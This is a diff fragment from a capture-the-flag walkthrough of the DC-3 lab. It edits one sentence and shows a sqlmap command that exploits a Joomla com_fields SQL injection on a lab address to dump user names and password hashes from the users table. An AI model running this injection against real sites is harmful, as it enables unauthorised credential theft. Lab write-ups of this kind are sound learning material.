BAROWZSKI/CTF-Walkthroughs/DC3.CTFWalktrough.md

 | username | non-numeric |
 +----------+-------------+
 ```
-Then, I tried to enumerate the #__users table using SQLmap.
+Then, I tried to exploit the #__users table using SQLmap.
 My goal was to gather the users and their passwords with the command below:

 ```bash
 sqlmap -u "http://10.0.2.12/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T '#__users' -C name,password --dump